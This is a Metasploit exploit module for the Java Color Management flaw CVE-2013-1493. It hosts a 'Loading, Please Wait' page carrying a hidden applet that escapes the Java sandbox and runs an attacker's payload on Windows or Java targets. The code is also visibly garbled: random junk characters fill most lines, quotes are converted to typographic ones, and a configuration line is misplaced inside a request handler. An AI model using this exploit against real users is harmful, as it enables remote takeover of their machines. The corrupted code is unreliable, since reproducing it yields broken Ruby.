##
, j( P4 Q% K. q. r
$ f Y0 Y/ W1 s1 k* Q. e. g# This file is part of the Metasploit Framework and may be subject to$ j2 o5 W( d3 d8 ?& m* ]; b8 B
# redistribution and commercial restrictions. Please see the Metasploit) q( v" g" v; f! `+ Q. D
# web site for more information on licensing and terms of use.
3 I2 A. A6 a. }% [% ~- ~# http://metasploit.com/; F8 l! q( ~0 J4 ?0 ?1 R- f
##
7 e5 w1 Z: X, q6 krequire ‘msf/core’
- m' r) ]- a9 v3 a7 P5 h: Irequire ‘rex’- |2 ]" f6 x* _( j
class Metasploit3 < Msf::Exploit::Remote
" p' y" g" N- z. @$ M. GRank = NormalRanking
8 G5 t& _$ m; E+ x$ y+ ^$ b, Ainclude Msf::Exploit::Remote::HttpServer::HTML; y* `; h% Y/ s0 i& x5 N
include Msf::Exploit::EXE
. n2 m4 {/ y6 ?( P* U9 S' g8 y6 }* Qinclude Msf::Exploit::Remote::BrowserAutopwn; s8 d. I! N) |
autopwn_info({ :javascript => false })
1 |; V# V( n) F a9 P) d8 Tdef initialize( info = {} )
) L4 n% h7 D; o4 U/ Isuper( update_info( info,
# A# X& t0 K! V; [3 G! D‘Name’ => ‘Java CMM Remote Code Execution’,4 n8 O" o1 g: i2 T/ w
‘Description’ => %q{5 N5 d& X q E
This module abuses the Color Management classes from a Java Applet to run
) b( E* _' C+ Y$ M* d3 B" varbitrary Java code outside of the sandbox as exploited in the wild in February D$ g5 I8 d' G7 @! M
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
- c5 [$ F2 g ^7 r9 o, Jand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP15 H' g, K6 f+ H( a, p5 c& Y
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java& H2 [( y+ C$ r
warning in order to run the malicious applet.
6 n% E9 [& ?9 U},
2 P; N6 n( b% ?6 t, \‘License’ => MSF_LICENSE,
! G) ?' f, R, e. j‘Author’ =>
' o, W: |9 g; [* I& h$ V/ x" d* }- ['Unknown', # Vulnerability discovery and Exploit
& S Z2 |! r2 i. E% X'juan vazquez' # Metasploit module (just ported the published exploit)+ O- a h3 Y4 I+ S
],) b7 z# S% s2 j
‘References’ =>
2 _: ~1 [( g+ g$ V' q[" Q7 O* L ?) u8 u0 c8 C
[ 'CVE', '2013-1493' ],; Z3 P: h% i2 Y3 Z5 z
[ 'OSVDB', '90737' ],1 Z$ h5 s( z2 W2 l. _
[ 'BID', '58238' ]," C2 B* v, ?$ C: b, ?
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
7 |8 H! b5 I' B _0 v[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],- ^, v3 e' b* V4 x
[ 'URL', 'http://pastie.org/pastes/6581034' ]0 o5 R6 X" e: ~9 e$ x
],
% f5 A4 z7 ]5 A' D8 f5 b+ W‘Platform’ => [ 'win', 'java' ]," y" z9 [% w8 z5 e J6 `
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
- A3 O. B; V: `% X; G‘Targets’ =>
* y, q6 D" Q* a% X: W. }! D) ?[5 B6 S2 f. ]! o
[ 'Generic (Java Payload)',% U `# a( S3 f8 o! J: X6 @' ?
{
) I( \4 c7 i) P8 V- g. e1 u2 k9 |'Platform' => 'java',
, \9 r( X3 ]6 l+ y. x; Y3 e'Arch' => ARCH_JAVA
* Q- w+ n, X# m8 u+ d1 H' d2 X}
3 L+ V9 M1 {- u8 S% R5 g. I* Z |],
$ h3 R1 V3 }' w: r, c[ 'Windows x86 (Native Payload)',% d# F0 Y+ ^9 L% C* r2 |: `1 v& ?
{
+ e. P; N, ]+ v! c6 I'Platform' => 'win',
+ d/ ]7 T5 s& k9 c3 x- H'Arch' => ARCH_X86( m( S$ M7 _( O0 X _1 f7 q
}( Z( n' ^+ }' L+ w# j
]
- v+ l+ {( F t8 h, Q8 I& o],
) `0 U7 k* c. A# M! J‘‘DisclosureDate’ => ‘Mar 01 2013′4 F, u. B# x; s- D
))
X: G9 n* v0 L, B4 G- O, E$ ~9 I; }end' M5 U8 K7 \4 c; o
def setup
; I, R, {7 ]9 Hpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)2 p: k: R& d" h1 ^4 t
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
5 i0 K* L# @% ? ?/ N3 [path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)- U+ O% e$ f, M, g, X w6 d
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }; L) d" j4 \* }. o; ]$ H, e4 b0 ~
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
, i5 m) L' B+ `# _2 a! y@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
6 u# T5 }7 j9 s% ~ Zpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
8 ~' _) v0 b- I! O2 L# l6 c# i@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
% A+ b- q1 ?, q% @& O1 K2 _@init_class_name = rand_text_alpha(“Init”.length)
/ Y, Y& u# v3 C2 c1 Y% |@init_class.gsub!(“Init”, @init_class_name)# B7 S) z" p1 b8 K t
super
+ O. x) q; v6 Q% eend) k t: b1 ~+ k
def on_request_uri(cli, request). V8 r' D# S6 x
print_status(“handling request for #{request.uri}”)# i2 K$ a9 w. f! R
case request.uri
" j5 x4 q+ m+ G4 O4 |4 _when /\.jar$/i
# v" J) O! U/ A, Y' qjar = payload.encoded_jar
/ s/ U8 t) P' u8 x4 Vjar.add_file(“#{@init_class_name}.class”, @init_class)
: r( R* h [. r3 Q& T# Z& t3 _jar.add_file(“Leak.class”, @leak_class)0 S8 W# Y3 R/ {* E! ~0 G! r+ V, D
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)- ]) |+ t: c6 Z& v' q4 B" g0 [
jar.add_file(“MyColorSpace.class”, @color_space_class)6 p% ]& a- d6 h |$ V9 ^; f& G
DefaultTarget’ => 1,
+ {: q/ Y, T5 l) _metasploit_str = rand_text_alpha(“metasploit”.length)
! g: w- g4 {7 M, M' xpayload_str = rand_text_alpha(“payload”.length)1 _2 E" a5 a0 U) `" q$ n
jar.entries.each { |entry| M! A2 M. {( j5 n& h6 ?; J$ |) o
entry.name.gsub!(“metasploit”, metasploit_str)
8 V' ]! J- `) @2 x8 z: Xentry.name.gsub!(“Payload”, payload_str)
: w! t( V' F7 G0 j# W7 {entry.data = entry.data.gsub(“metasploit”, metasploit_str)
) {5 ^# w8 ?# j- {entry.data = entry.data.gsub(“Payload”, payload_str)8 q$ m# E# \! `7 g
}
3 C: C& A, j% B: b* _( o$ Ajar.build_manifest
' w' ]( }' f9 p, N6 E) F' K' wsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
" b( Z7 Z3 O5 Wwhen /\/$// ?1 }1 U: E, _1 k$ C0 v
payload = regenerate_payload(cli)
2 A8 @, i' e% o' S2 C* |- a5 xif not payload
( q4 q8 M# s5 s( Iprint_error(“Failed to generate the payload.”)
0 D* }( R( p% n+ o; U% a' ]) }send_not_found(cli)
1 }2 L: f. N# x& ]return0 c8 F$ R! K0 U5 N/ N
end/ b% W& J# X$ x1 d" l) I1 \
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
- q& G+ i3 @0 p: g- B4 Z% Melse
( F D( q* j( Bsend_redirect(cli, get_resource() + ‘/’, ”); A/ }3 ^+ }4 ]* ^) t2 \
end
) }* Y3 a( V; N- B; @- o- qend9 R0 L) U% w, y, w g
def generate_html
. u7 u9 `1 x' J/ U0 S6 |html = %Q|<html><head><title>Loading, Please Wait…</title></head>|& y4 r" t, Z* k# d0 X9 z
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|& k& h2 ^. [( ~) I
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|' H0 z5 z0 x3 v( D$ f4 P; ~8 c
html += %Q|</applet></body></html>|
2 n' N4 C& b. u, i! _, rreturn html
& E& c% m. Q( P4 ]4 D& l3 a4 Xend
0 O% c4 A; B$ M/ x! ~end0 g- ^9 S8 ]7 U: e4 n& @' D
end/ z( p! Z& U8 L1 `1 x3 H8 Z9 ~
|